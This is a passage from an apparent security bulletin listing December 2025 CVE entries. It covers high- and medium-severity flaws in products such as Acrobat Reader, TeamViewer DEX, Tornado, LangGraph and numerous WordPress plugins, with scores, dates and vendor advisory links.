| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30264, 20.005.30793, 25.001.20982, 24.001.30273, 20.005.30803 and earlier are affected by an Untrusted Search Path vulnerability that might allow attackers to execute arbitrary code in the context of the current user. If the application uses a search path to locate critical resources such as programs, an attacker could modify that search path to point to a malicious program, which the targeted application would then execute. Exploitation of this issue does not require user interaction. | 2025-12-09 | 7.8 | CVE-2025-64785 | https://helpx.adobe.com/security/products/acrobat/apsb25-119.html |
| Adobe--DNG SDK | DNG SDK versions 1.7.0 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure or application denial of service. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-12-09 | 7.1 | CVE-2025-64893 | https://helpx.adobe.com/security/products/dng-sdk/apsb25-118.html |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30264, 20.005.30793, 25.001.20982, 24.001.30273, 20.005.30803 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-12-09 | 7.8 | CVE-2025-64899 | https://helpx.adobe.com/security/products/acrobat/apsb25-119.html |
| TeamViewer--DEX | A command injection vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-Explorer-TachyonCore-DevicesListeningOnAPort instruction prior V21. Improper input validation, allowing authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform. | 2025-12-11 | 7.2 | CVE-2025-64986 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/ |
| TeamViewer--DEX | A command injection vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-Explorer-TachyonCore-CheckSimpleIoC instruction. Improper input validation, allowing authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform. | 2025-12-11 | 7.2 | CVE-2025-64987 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/ |
| TeamViewer--DEX | A command injection vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-Nomad-GetCmContentLocations instruction prior V19.2. Improper input validation, allowing authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform. | 2025-12-11 | 7.2 | CVE-2025-64988 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/ |
| TeamViewer--DEX | A command injection vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-Explorer-TachyonCore-FindFileBySizeAndHash instruction prior V21.1. Improper input validation, allowing authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform. | 2025-12-11 | 7.2 | CVE-2025-64989 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/ |
| Windscribe--Windscribe for Linux Desktop App | A command injection vulnerability exists in Windscribe for Linux Desktop App that allows a local user who is a member of the windscribe group to execute arbitrary commands as root via the 'adapterName' parameter of the 'changeMTU' function. Fixed in Windscribe v2.18.3-alpha and v2.18.8. | 2025-12-10 | 7.8 | CVE-2025-65199 | url url url url url url |
| wearefrank--ladybug | Ladybug adds message-based debugging, unit, system, and regression testing to Java applications. Versions prior to 3.0-20251107.114628 contain the APIs /iaf/ladybug/api/report/{storage} and /iaf/ladybug/api/report/upload, which allow uploading gzip-compressed XML files with user-controllable content. The system deserializes these XML files, enabling attackers to achieve Remote Code Execution (RCE) by submitting carefully crafted XML payloads and thereby gain access to the target server. This issue is fixed in version 3.0-20251107.114628. | 2025-12-09 | 7 | CVE-2025-66214 | https://github.com/wearefrank/ladybug/security/advisories/GHSA-f9fh-r3cv-398f |
| Huawei--HarmonyOS | Race condition vulnerability in the network module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-12-08 | 7.1 | CVE-2025-66327 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| 1Panel-dev--1Panel | 1Panel is an open-source, web-based control panel for Linux server management. Versions 2.0.13 and below allow an unauthenticated attacker to disable CAPTCHA verification by abusing a client-controlled parameter. Because the server previously trusted this value without proper validation, CAPTCHA protections can be bypassed, enabling automated login attempts and significantly increasing the risk of account takeover (ATO). This issue is fixed in version 2.0.14. | 2025-12-09 | 7.5 | CVE-2025-66507 | https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-qmg5-v42x-qqhq https://github.com/1Panel-dev/1Panel/commit/ac43f00273be745f8d04b90b6e2b9c1a40ef7bca https://github.com/1Panel-dev/1Panel/releases/tag/v2.0.14 |
| ImageMagick--ImageMagick | ImageMagick is a software suite to create, edit, compose, or convert bitmap images. In versions 7.1.2-9 and prior, the TIM (PSX TIM) image parser contains a critical integer overflow vulnerability in its ReadTIMImage function (coders/tim.c). The code reads width and height (16-bit values) from the file header and calculates image_size = 2 * width * height without checking for overflow. On 32-bit systems (or where size_t is 32-bit), this calculation can overflow if width and height are large (e.g., 65535), wrapping around to a small value. This results in a small heap allocation via AcquireQuantumMemory and later operations relying on the dimensions can trigger an out of bounds read. This issue is fixed in version 7.1.2-10. | 2025-12-10 | 7.5 | CVE-2025-66628 | https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-6hjr-v6g4-3fm8 https://github.com/dlemstra/Magick.NET/commit/2dfa08e15cfd11016a79615994787b14f9048b1c |
| zauberzeug--nicegui | NiceGUI is a Python-based UI framework. Versions 3.3.1 and below are vulnerable to directory traversal through the App.add_media_files() function, which allows a remote attacker to read arbitrary files on the server filesystem. This issue is fixed in version 3.4.0. | 2025-12-09 | 7.5 | CVE-2025-66645 | https://github.com/zauberzeug/nicegui/security/advisories/GHSA-hxp3-63hc-5366 https://github.com/zauberzeug/nicegui/commit/a1b89e2a24e1911a40389ace2153a37f4eea92a9 |
| Zoom Communications Inc.--Zoom Rooms | Protection Mechanism Failure of Software Downgrade in Zoom Rooms for Windows before 6.6.0 may allow an unauthenticated user to conduct an escalation of privilege via local access. | 2025-12-10 | 7.8 | CVE-2025-67460 | https://www.zoom.com/en/trust/security-bulletin/zsb-25050 |
| siyuan-note--siyuan | SiYuan is self-hosted, open source personal knowledge management software. Versions 0.0.0-20251202123337-6ef83b42c7ce and below contain function importZipMd which is vulnerable to ZipSlips, allowing an authenticated user to overwrite files on the system. An authenticated user with access to the import functionality in notes is able to overwrite any file on the system, and can escalate to full code execution under some circumstances. A fix is planned for version 3.5.0. | 2025-12-09 | 7.8 | CVE-2025-67488 | https://github.com/siyuan-note/siyuan/security/advisories/GHSA-gqfv-g4v7-m366 https://github.com/siyuan-note/siyuan/blob/dae6158860cc704e353454565c96e874278c6f47/kernel/api/import.go#L190 |
| langchain-ai--langgraph | LangGraph SQLite Checkpoint is an implementation of LangGraph CheckpointSaver that uses SQLite DB (both sync and async, via aiosqlite). Versions 3.0.0 and below are vulnerable to SQL injection through the checkpoint implementation. Checkpoint allows attackers to manipulate SQL queries through metadata filter keys, affecting applications that accept untrusted metadata filter keys (not just filter values) in checkpoint search operations. The _metadata_predicate() function constructs SQL queries by interpolating filter keys directly into f-strings without validation. This issue is fixed in version 3.0.1. | 2025-12-10 | 7.3 | CVE-2025-67644 | https://github.com/langchain-ai/langgraph/security/advisories/GHSA-9rwj-6rc7-p77c https://github.com/langchain-ai/langgraph/commit/297242913f8ad2143ee3e2f72e67db0911d48e2a |
| shopware--shopware | Shopware is an open commerce platform. Versions 6.4.6.0 through 6.6.10.9 and 6.7.0.0 through 6.7.5.0 have a Reflected XSS vulnerability in AuthController.php. A request parameter from the login page URL is directly rendered within the Twig template of the Storefront login page without further processing or input validation. This allows direct code injection into the template via the URL parameter, waitTime, which lacks proper input validation. This issue is fixed in versions 6.6.10.10 and 6.7.5.1. | 2025-12-10 | 7.1 | CVE-2025-67648 | https://github.com/shopware/shopware/security/advisories/GHSA-6w82-v552-wjw2 https://github.com/shopware/shopware/commit/c9242c02c84595d9fa3e2adf6a264bc90a657b58 |
| tornadoweb--tornado | Tornado is a Python web framework and asynchronous networking library. In versions 6.5.2 and below, a single maliciously crafted HTTP request can block the server's event loop for an extended period, caused by the HTTPHeaders.add method. The function accumulates values using string concatenation when the same header name is repeated, causing a Denial of Service (DoS). Due to Python string immutability, each concatenation copies the entire string, resulting in O(n²) time complexity. The severity can vary from high if max_header_size has been increased from its default, to low if it has its default value of 64KB. This issue is fixed in version 6.5.3. | 2025-12-12 | 7.5 | CVE-2025-67725 | https://github.com/tornadoweb/tornado/security/advisories/GHSA-c98p-7wgm-6p64 https://github.com/tornadoweb/tornado/commit/771472cfdaeebc0d89a9cc46e249f8891a6b29cd https://github.com/tornadoweb/tornado/releases/tag/v6.5.3 |
| tornadoweb--tornado | Tornado is a Python web framework and asynchronous networking library. Versions 6.5.2 and below use an inefficient algorithm when parsing parameters for HTTP header values, potentially causing a DoS. The _parseparam function in httputil.py is used to parse specific HTTP header values, such as those in multipart/form-data and repeatedly calls string.count() within a nested loop while processing quoted semicolons. If an attacker sends a request with a large number of maliciously crafted parameters in a Content-Disposition header, the server's CPU usage increases quadratically (O(n²)) during parsing. Due to Tornado's single event loop architecture, a single malicious request can cause the entire server to become unresponsive for an extended period. This issue is fixed in version 6.5.3. | 2025-12-12 | 7.5 | CVE-2025-67726 | https://github.com/tornadoweb/tornado/security/advisories/GHSA-jhmp-mqwm-3gq8 https://github.com/tornadoweb/tornado/commit/771472cfdaeebc0d89a9cc46e249f8891a6b29cd https://github.com/tornadoweb/tornado/releases/tag/v6.5.3 |
| Meta--react-server-dom-parcel | It was found that the fix addressing CVE-2025-55184 in React Server Components was incomplete and does not prevent a denial of service attack in a specific case. React Server Components versions 19.0.2, 19.1.3 and 19.2.2 are affected, allowing unsafe deserialization of payloads from HTTP requests to Server Function endpoints. This can cause an infinite loop that hangs the server process and may prevent future HTTP requests from being served. | 2025-12-11 | 7.5 | CVE-2025-67779 | https://www.facebook.com/security/advisories/cve-2025-67779 https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| JBL--Flip 5 | An unauthorised attacker within bluetooth range may use an improper validation during the BLE connection request to deadlock the affected devices. | 2025-12-10 | 6.5 | CVE-2024-2105 | https://harman.csaf-tp.certvde.com/.well-known/csaf/white/2025/hbsa-2025-0002.json https://certvde.com/en/advisories/VDE-2025-089 |
| Fortinet--FortiProxy | An insertion of sensitive information into log file vulnerability [CWE-532] in FortiOS 7.4.0 through 7.4.3, 7.2.0 through 7.2.7, 7.0 all versions; FortiProxy 7.4.0 through 7.4.3, 7.2.0 through 7.2.11; FortiPAM 1.4 all versions, 1.3 all versions, 1.2 all versions, 1.1 all versions, 1.0 all versions and FortiSRA 1.4 all versions may allow a read-only administrator to retrieve API tokens of other administrators via observing REST API logs, if REST API logging is enabled (non-default configuration). | 2025-12-09 | 6.3 | CVE-2024-47570 | https://fortiguard.fortinet.com/psirt/FG-IR-24-268 |
| themefusecom--Brizy Page Builder | The Brizy - Page Builder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.7.16 via the get_users() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including email addresses and hashed passwords of administrators. | 2025-12-13 | 6.5 | CVE-2025-0969 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5987ef13-15d6-4ecf-894c-f22c8726402b?source=cve https://plugins.trac.wordpress.org/browser/brizy/trunk/editor/api.php#L961 https://wordpress.org/plugins/brizy/#developers https://plugins.trac.wordpress.org/changeset/3392844 |
| fernandobt--List category posts | The List category posts plugin for WordPress is vulnerable to time-based SQL Injection via the 'starting_with' parameter of the catlist shortcode in all versions up to, and including, 0.91.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-11 | 6.5 | CVE-2025-10163 | https://www.wordfence.com/threat-intel/vulnerabilities/id/21708205-dd43-4b22-9151-bc6f882422cb?source=cve https://plugins.trac.wordpress.org/browser/list-category-posts/tags/0.91.0/include/lcp-parameters.php#L240 |
| Grassroots--DICOM (GDCM) | An out-of-bounds write vulnerability exists in the Grassroots DICOM library (GDCM). The issue is triggered during parsing of a malformed DICOM file containing encapsulated PixelData fragments (compressed image data stored as multiple fragments). This vulnerability leads to a segmentation fault caused by an out-of-bounds memory access due to unsigned integer underflow in buffer indexing. It is exploitable via file input, simply opening a crafted malicious DICOM file is sufficient to trigger the crash, resulting in a denial-of-service condition. | 2025-12-12 | 6.6 | CVE-2025-11266 | https://github.com/malaterre/GDCM/releases/tag/v3.2.2 https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-345-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsma-25-345-01.json |
| extendthemes--Colibri Page Builder | The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'colibri_loop' shortcode in all versions up to, and including, 1.0.335 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-11376 | https://www.wordfence.com/threat-intel/vulnerabilities/id/38eaf4be-5083-46fe-b586-e4be190dc9cc?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3377192%40colibri-page-builder&new=3377192%40colibri-page-builder&sfp_email=&sfph_mail= |
| jbrinley--Mailgun Subscriptions | The Mailgun Subscriptions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mailgun_subscription_form' shortcode in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-11876 | https://www.wordfence.com/threat-intel/vulnerabilities/id/149e60cc-9612-4651-b02d-4b68a3533d36?source=cve https://plugins.trac.wordpress.org/browser/mailgun-subscriptions/tags/1.2.0/Mailgun_Subscriptions/Subscription_Form.php#L101 https://github.com/flightless/mailgun-subscriptions/pull/8/commits/a8b597e3a09f3a1b76436d09de434fd9bfe29f64 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3413662%40mailgun-subscriptions&new=3413662%40mailgun-subscriptions&sfp_email=&sfph_mail= |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.1 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an authenticated user to bypass WebAuthn two-factor authentication by manipulating the session state under certain conditions. | 2025-12-11 | 6.8 | CVE-2025-11984 | GitLab Issue #577847 HackerOne Bug Bounty Report #3322714 https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/ |
| f1logic--Social Media Auto Publish | The Social Media Auto Publish plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PostMessage parameter in all versions up to, and including, 3.6.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-13 | 6.1 | CVE-2025-12076 | https://www.wordfence.com/threat-intel/vulnerabilities/id/79ae682a-c048-427c-abf8-3ecbccc9c95c?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3412065%40social-media-auto-publish&new=3412065%40social-media-auto-publish&sfp_email=&sfph_mail= |
| f1logic--WP to LinkedIn Auto Publish | The WP to LinkedIn Auto Publish plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PostMessage in all versions up to, and including, 1.9.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-13 | 6.1 | CVE-2025-12077 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b680132a-f397-4636-98b2-bcd8c168e822?source=cve https://plugins.trac.wordpress.org/browser/linkedin-auto-publish/trunk/js/notice.js https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3412103%40linkedin-auto-publish&new=3412103%40linkedin-auto-publish&sfp_email=&sfph_mail= |
| mahethekiller--Header Footer Script Adder Insert Code in Header, Body & Footer | The Header Footer Script Adder - Insert Code in Header, Body & Footer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the script adder present in posts in all versions up to, and including, 2.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-12109 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cab034fd-4cf2-4253-bbcd-c8bb86325fa8?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3388587%40header-and-footer-script-adder&new=3388587%40header-and-footer-script-adder&sfp_email=&sfph_mail= |
| wpvibes--Addon Elements for Elementor (formerly Elementor Addon Elements) | The Addon Elements for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.14.3. This is due to insufficient input sanitization and output escaping on multiple widget parameters. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts via multiple widget parameters in pages that will execute whenever a user accesses an injected page. | 2025-12-14 | 6.4 | CVE-2025-12537 | https://www.wordfence.com/threat-intel/vulnerabilities/id/94217d06-21c2-443d-ae2c-a2dbd65b7908?source=cve https://plugins.trac.wordpress.org/changeset/3415227/addon-elements-for-elementor-page-builder/trunk/assets/js/eae.js |
| sgcoskey--Simple post listing | The Simple post listing plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class_name' parameter in the postlist shortcode in all versions up to, and including, 0.2. This is due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page via mouse interaction. | 2025-12-12 | 6.4 | CVE-2025-12650 | https://www.wordfence.com/threat-intel/vulnerabilities/id/dfdebeab-89f6-49b8-a38f-de2a8df7a7e8?source=cve https://plugins.trac.wordpress.org/browser/simple-post-listing/tags/0.2/simple-post-listing.php#L77 |
| TeamViewer--DEX | A vulnerability in TeamViewer DEX Client (former 1E Client) - Content Distribution Service (NomadBranch.exe) prior version 25.11 for Windows allows malicious actors to cause a denial of service (application crash) via a crafted command, resulting in service termination. | 2025-12-11 | 6.5 | CVE-2025-12687 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1005/ |
| wpdive--Better Addons for Elementor | The Better Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Slider widget in all versions up to, and including, 1.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-12830 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d714d740-d7e0-49fd-af08-b4a80c9d0599?source=cve https://wordpress.org/plugins/better-elementor-addons/ https://plugins.trac.wordpress.org/browser/better-elementor-addons/tags/1.5.4/widgets/slider/styles/style1.php#L19 https://plugins.trac.wordpress.org/browser/better-elementor-addons/tags/1.5.4/widgets/slider/styles/style2.php#L17 https://plugins.trac.wordpress.org/browser/better-elementor-addons/tags/1.5.4/widgets/slider/styles/style5.php#L12 |
| zealopensource--Accept Stripe Payments Using Contact Form 7 | The Accept Stripe Payments Using Contact Form 7 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'failure_message' parameter in versions up to, and including, 3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-12 | 6.1 | CVE-2025-12834 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d9e77e3f-dcd8-426a-be0f-24eb65c6709e?source=cve https://plugins.trac.wordpress.org/browser/accept-stripe-payments-using-contact-form-7/tags/3.1/inc/lib/class.cf7sa.lib.php#L696 |
| iworks--Simple CSV Table | The Simple CSV Table plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.0.1 via the `href` parameter in the `[csv]` shortcode. This is due to insufficient path validation before concatenating user-supplied input to a base directory path. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information such as database credentials and authentication keys. | 2025-12-12 | 6.5 | CVE-2025-12960 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4ff9abb4-2b25-4bbb-86b4-fb1ba37e122f?source=cve https://plugins.trac.wordpress.org/browser/simple-csv-table/tags/1.0.1/simple-csv-table.php#L71 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3403210%40simple-csv-table&new=3403210%40simple-csv-table&sfp_email=&sfph_mail= |
| nalam-1--Magical Posts Display Elementor Advanced Posts widgets | The Magical Posts Display plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'mpac_title_tag' parameter in the Magical Posts Accordion widget in all versions up to, and including, 1.2.54 due to insufficient input sanitization and output escaping on user-supplied HTML tag names. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-12965 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8352400f-fea1-486d-872a-66340300cee9?source=cve https://wordpress.org/plugins/magical-posts-display/ https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3407965%40magical-posts-display&new=3407965%40magical-posts-display&sfp_email=&sfph_mail=#file34 |
| wpusermanager--WP User Manager User Profile Builder & Membership | The WP User Manager plugin for WordPress is vulnerable to Arbitrary File Deletion in all versions up to, and including, 2.9.12. This is due to insufficient validation of user-supplied file paths in the profile update functionality combined with improper handling of array inputs by PHP's filter_input() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server via the 'current_user_avatar' parameter in a two-stage attack which can make remote code execution possible. This only affects sites with the custom avatar setting enabled. | 2025-12-12 | 6.8 | CVE-2025-13320 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9d8304bf-bec2-4fcf-9fe2-46b626b3dae9?source=cve https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L70 https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L70 https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L75 https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L75 https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L86 https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L86 |
| Altera--Quartus Prime Pro | Under certain circumstances, the Quartus Prime Pro Installer for Windows does not check the permissions of the Quartus target installation directory if the target installation directory already exists. | 2025-12-11 | 6.7 | CVE-2025-13663 | https://www.altera.com/security/security-advisory/asa-0001 |
| Altera--Quartus Prime Standard | A potential security vulnerability in Quartus® Prime Standard Edition Design Software may allow escalation of privilege. | 2025-12-11 | 6.7 | CVE-2025-13664 | https://www.altera.com/security/security-advisory/asa-0002 |
| Altera--Quartus Prime Standard | The System Console Utility for Windows is vulnerable to a DLL planting vulnerability | 2025-12-12 | 6.7 | CVE-2025-13665 | https://www.altera.com/security/security-advisory/asa-0002 |
| Altera--Quartus Prime Pro | A potential security vulnerability in Quartus® Prime Pro Edition Design Software may allow escalation of privilege. | 2025-12-11 | 6.7 | CVE-2025-13668 | https://www.altera.com/security/security-advisory/asa-0001 |
| Altera--High Level Synthesis Compiler | Uncontrolled Search Path Element vulnerability in Altera High Level Synthesis Compiler on Windows allows Search Order Hijacking. This issue affects High Level Synthesis Compiler: from 19.1 through 24.3. | 2025-12-12 | 6.7 | CVE-2025-13669 | https://www.altera.com/security/security-advisory/asa-0003 |
| Altera--High Level Synthesis Compiler | The High Level Synthesis Compiler i++ command for Windows is vulnerable to a DLL planting vulnerability | 2025-12-12 | 6.7 | CVE-2025-13670 | https://www.altera.com/security/security-advisory/asa-0003 |
| blakelong--Custom Frames | The Custom Frames plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' parameter of the 'customframe' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-13705 | https://www.wordfence.com/threat-intel/vulnerabilities/id/56f3aa7a-a6f2-42c7-b855-b083fe58f466?source=cve https://plugins.trac.wordpress.org/browser/custom-frames/trunk/class.customframes.php#L65 https://plugins.trac.wordpress.org/browser/custom-frames/tags/1.0.1/class.customframes.php#L65 |
| ice00--NewStatPress | The NewStatPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a regex bypass in nsp_shortcode function in all versions up to, and including, 1.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13747 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e7ddc418-9458-4335-afdc-6d40c7e23060?source=cve https://plugins.trac.wordpress.org/browser/newstatpress/tags/1.4.3/includes/nsp-core.php#L637 |
| jenyay--LJUsers | The LJUsers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'name' parameter of the 'ljuser' shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13839 | https://www.wordfence.com/threat-intel/vulnerabilities/id/841adf53-930a-4286-96d0-9ee8b0c188c4?source=cve https://plugins.trac.wordpress.org/browser/ljusers/trunk/ljusers.php#L194 https://plugins.trac.wordpress.org/browser/ljusers/tags/1.2.0/ljusers.php#L194 |
| bobvanoorschot--BUKAZU Search widget | The BUKAZU Search widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'shortcode' parameter of the 'bukazu_search' shortcode in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13840 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a666d0e4-4fa7-4794-b270-afbccf5036c6?source=cve https://plugins.trac.wordpress.org/browser/bukazu-search-widget/trunk/bukazu-widget.php#L277 https://plugins.trac.wordpress.org/browser/bukazu-search-widget/tags/3.3.2/bukazu-widget.php#L277 |
| susantabeura--VigLink SpotLight By ShortCode | The VigLink SpotLight By ShortCode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'float' parameter of the 'spotlight' shortcode in all versions up to, and including, 1.0.a due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13843 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f1275a8f-c9ac-4cb3-8aa2-1393ffcc9dc8?source=cve https://plugins.trac.wordpress.org/browser/viglink-spotlight-by-shortcode/trunk/spotlight.php#L20 https://plugins.trac.wordpress.org/browser/viglink-spotlight-by-shortcode/tags/1.0.a/spotlight.php#L20 |
| qrevo--Easy Map Creator | The Easy Map Creator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'width' parameter in all versions up to, and including, 3.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13846 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6e185479-843c-4748-83e5-ae0b300c3fc7?source=cve https://plugins.trac.wordpress.org/browser/easy-map-creator/trunk/easy_map_creator.php#L139 https://plugins.trac.wordpress.org/browser/easy-map-creator/tags/3.0.2/easy_map_creator.php#L139 |
| ladislavsoukupgmailcom--LS Google Map Router | The LS Google Map Router plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'map_type' parameter in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13850 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e3581172-10d8-4b11-95f7-ee1835e29606?source=cve https://plugins.trac.wordpress.org/browser/ls-gmap-route/trunk/ls-gmap_route.php#L61 https://plugins.trac.wordpress.org/browser/ls-gmap-route/tags/1.1.0/ls-gmap_route.php#L61 |
